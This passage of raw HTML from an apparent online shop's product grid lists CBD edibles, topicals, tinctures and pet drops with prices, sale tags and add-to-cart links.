srcset="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-3-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-3-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=1124" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="1124" data-product_sku="logo-collection-1-1" aria-label="Add “oil sugar scrub1000mg” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/oil-sugar-scrub1000mg-2/">oil sugar scrub1000mg</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce3025d72d" data-product-id="1124"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 18.00</bdi></span></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/60ml-size-bottle-only-2000mg-3000mg/" class="image"> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Drinks-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Drinks-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Drinks-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=22" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="22" data-product_sku="woo-hoodie-with-zipper" aria-label="Add “60ml size bottle ONLY 2000mg 3000mg” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/60ml-size-bottle-only-2000mg-3000mg/">60ml size bottle ONLY 2000mg 3000mg</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce3025de2a" data-product-id="22"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 45.00</bdi></span></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/bath-bomb-100mg-2/" class="image"> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-5-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-5-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-5-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=1126" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="1126" data-product_sku="logo-collection-1-1-1" aria-label="Add “bath bomb 100mg” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/bath-bomb-100mg-2/">bath bomb 100mg</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce3025e2aa" data-product-id="1126"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 18.00</bdi></span></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/cream-balms/" class="image"> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Topicals-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Topicals-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Topicals-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=23" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="23" data-product_sku="woo-long-sleeve-tee" aria-label="Add “cream balms” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/cream-balms/">cream balms</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce3025e9d3" data-product-id="23"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 25.00</bdi></span></span></span> </div> </div> </div> </div> </div> </div> </div> </div> <div class="elementor-element elementor-element-b29721b animated-slow elementor-invisible elementor-widget elementor-widget-woolentor-product-tab" data-id="b29721b" data-element_type="widget" data-settings="{"_animation":"fadeInRight"}" data-widget_type="woolentor-product-tab.default"> <div class="elementor-widget-container"> <div class="product-style"> <div class="product-tab-list ht-text-center"> <ul class="ht-tab-menus"> </ul> </div> <div class="ht-row"> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/12-or-36-caps-10mg-each/" class="image"> <span class="onsale">Sale!</span> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles6-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles6-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Edibles6-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=1151" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="1151" data-product_sku="CBD personal care-1-2" aria-label="Add “CBD capsules 12 or 36 caps 10mg each” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/12-or-36-caps-10mg-each/">CBD capsules 12 or 36 caps 10mg each</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce30260660" data-product-id="1151"><del aria-hidden="true"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 3.00</bdi></span></del> <ins><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 2.00</bdi></span></ins></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/300mgcbd/" class="image"> <span class="onsale">Sale!</span> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles5-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles5-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Edibles5-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=1148" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="1148" data-product_sku="CBD personal care-1-1" aria-label="Add “CBD gummies Jar/ 30pieces 300mgCBD” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/300mgcbd/">CBD gummies Jar/ 30pieces 300mgCBD</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce30260be3" data-product-id="1148"><del aria-hidden="true"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 3.00</bdi></span></del> <ins><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 2.00</bdi></span></ins></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/cbd-gummies-bags-6-pieces-200mgcbd/" class="image"> <span class="onsale">Sale!</span> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles4-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles4-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Edibles4-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=1142" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="1142" data-product_sku="CBD personal care-1" aria-label="Add “CBD gummies bags/6 pieces 200mgCBD” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/cbd-gummies-bags-6-pieces-200mgcbd/">CBD gummies bags/6 pieces 200mgCBD</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce30261192" data-product-id="1142"><del aria-hidden="true"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 3.00</bdi></span></del> <ins><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 2.00</bdi></span></ins></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/bath-bomb-100mg-2/" class="image"> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-5-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-5-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-5-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=1126" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="1126" data-product_sku="logo-collection-1-1-1" aria-label="Add “bath bomb 100mg” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/bath-bomb-100mg-2/">bath bomb 100mg</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce30261614" data-product-id="1126"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 18.00</bdi></span></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/oil-sugar-scrub1000mg-2/" class="image"> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-3-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-3-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-3-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=1124" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="1124" data-product_sku="logo-collection-1-1" aria-label="Add “oil sugar scrub1000mg” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/oil-sugar-scrub1000mg-2/">oil sugar scrub1000mg</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce30261aac" data-product-id="1124"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 18.00</bdi></span></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/lube-1000mg/" class="image"> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-4-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-4-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-4-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=942" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="942" data-product_sku="logo-collection-1" aria-label="Add “lube 1000mg” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/lube-1000mg/">lube 1000mg</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce30261f1e" data-product-id="942"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 18.00</bdi></span></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/oil-sugar-scrub1000mg/" class="image"> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-1-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-1-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-1-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=35" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="35" data-product_sku="logo-collection" aria-label="Add “oil sugar scrub1000mg” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/oil-sugar-scrub1000mg/">oil sugar scrub1000mg</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce30262396" data-product-id="35"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 18.00</bdi></span></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/oil-tincture-30ml-or-60-ml-size-bottle/" class="image"> <span class="onsale">Sale!</span> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles1-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles1-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Edibles1-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=34" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="34" data-product_sku="Woo-beanie-logo" aria-label="Add “Oil tincture 30ml or 60 ml size bottle” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/oil-tincture-30ml-or-60-ml-size-bottle/">Oil tincture 30ml or 60 ml size bottle</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce30262941" data-product-id="34"><del aria-hidden="true"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 20.00</bdi></span></del> <ins><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 18.00</bdi></span></ins></span></span> </div> </div> </div> </div> </div> </div> </div> </div> <div class="elementor-element elementor-element-e0aaa94 animated-slow elementor-invisible elementor-widget elementor-widget-woolentor-product-tab" data-id="e0aaa94" data-element_type="widget" data-settings="{"_animation":"fadeInLeft"}" data-widget_type="woolentor-product-tab.default"> <div class="elementor-widget-container"> <div class="product-style"> <div class="product-tab-list ht-text-center"> <ul class="ht-tab-menus"> </ul> </div> <div class="ht-row"> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> </div> </div> </div> </div> </div> <div class="elementor-element elementor-element-04afcbd elementor-invisible elementor-widget elementor-widget-woolentor-product-tab" data-id="04afcbd" data-element_type="widget" data-settings="{"_animation":"fadeInRight"}" data-widget_type="woolentor-product-tab.default"> <div class="elementor-widget-container"> <div class="product-style"> <div class="product-tab-list ht-text-center"> <ul class="ht-tab-menus"> </ul> </div> <div class="ht-row"> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/lube-1000mg/" class="image"> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-4-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-4-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-4-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=942" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="942" data-product_sku="logo-collection-1" aria-label="Add “lube 1000mg” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/lube-1000mg/">lube 1000mg</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce30265d57" data-product-id="942"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 18.00</bdi></span></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/sunglasses/" class="image"> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Vape2-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Vape2-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Vape2-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=20" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="20" data-product_sku="woo-sunglasses" aria-label="Add “CBD for Pets drops bacon salon beef 30 ml bottle” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/sunglasses/">CBD for Pets drops bacon salon beef 30 ml bottle</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce30266260" data-product-id="20"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 90.00</bdi></span></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/cbd-gummies-bags-6-pieces-200mgcbd/" class="image"> <span class="onsale">Sale!</span> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles4-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles4-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Edibles4-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=1142" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="1142" data-product_sku="CBD personal care-1" aria-label="Add “CBD gummies bags/6 pieces 200mgCBD” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/cbd-gummies-bags-6-pieces-200mgcbd/">CBD gummies bags/6 pieces 200mgCBD</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce302667ef" data-product-id="1142"><del aria-hidden="true"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 3.00</bdi></span></del> <ins><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 2.00</bdi></span></ins></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/hoodie-with-pocket/" class="image"> <span class="onsale">Sale!</span> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Vape3-324x324.png" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Vape3-324x324.png 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Vape3-100x100.png 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=21" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="21" data-product_sku="woo-hoodie-with-pocket" aria-label="Add “CBD 100mg or 300mg” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/hoodie-with-pocket/">CBD 100mg or 300mg</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce30266d7d" data-product-id="21"><del aria-hidden="true"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 45.00</bdi></span></del> <ins><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 35.00</bdi></span></ins></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/oil-sugar-scrub1000mg-2/" class="image"> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-3-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-3-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-3-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=1124" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="1124" data-product_sku="logo-collection-1-1" aria-label="Add “oil sugar scrub1000mg” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/oil-sugar-scrub1000mg-2/">oil sugar scrub1000mg</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce3026722d" data-product-id="1124"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 18.00</bdi></span></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/60ml-size-bottle-only-2000mg-3000mg/" class="image"> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Drinks-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Drinks-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Drinks-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=22" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="22" data-product_sku="woo-hoodie-with-zipper" aria-label="Add “60ml size bottle ONLY 2000mg 3000mg” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/60ml-size-bottle-only-2000mg-3000mg/">60ml size bottle ONLY 2000mg 3000mg</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce30267701" data-product-id="22"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 45.00</bdi></span></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/bath-bomb-100mg-2/" class="image"> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-5-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-5-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-5-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=1126" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="1126" data-product_sku="logo-collection-1-1-1" aria-label="Add “bath bomb 100mg” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/bath-bomb-100mg-2/">bath bomb 100mg</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce30267b89" data-product-id="1126"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 18.00</bdi></span></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/cream-balms/" class="image"> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Topicals-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Topicals-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Topicals-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=23" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="23" data-product_sku="woo-long-sleeve-tee" aria-label="Add “cream balms” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/cream-balms/">cream balms</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce30268067" data-product-id="23"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 25.00</bdi></span></span></span> </div> </div> </div> </div> </div> </div> </div> </div> <div class="elementor-element elementor-element-a57b658 elementor-invisible elementor-widget elementor-widget-woolentor-product-tab" data-id="a57b658" data-element_type="widget" data-settings="{"_animation":"fadeInLeft"}" data-widget_type="woolentor-product-tab.default"> <div class="elementor-widget-container"> <div class="product-style"> <div class="product-tab-list ht-text-center"> <ul class="ht-tab-menus"> </ul> </div> <div class="ht-row"> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/12-or-36-caps-10mg-each/" class="image"> <span class="onsale">Sale!</span> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles6-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles6-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Edibles6-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=1151" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="1151" data-product_sku="CBD personal care-1-2" aria-label="Add “CBD capsules 12 or 36 caps 10mg each” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/12-or-36-caps-10mg-each/">CBD capsules 12 or 36 caps 10mg each</a></h4> <span class="price"><span 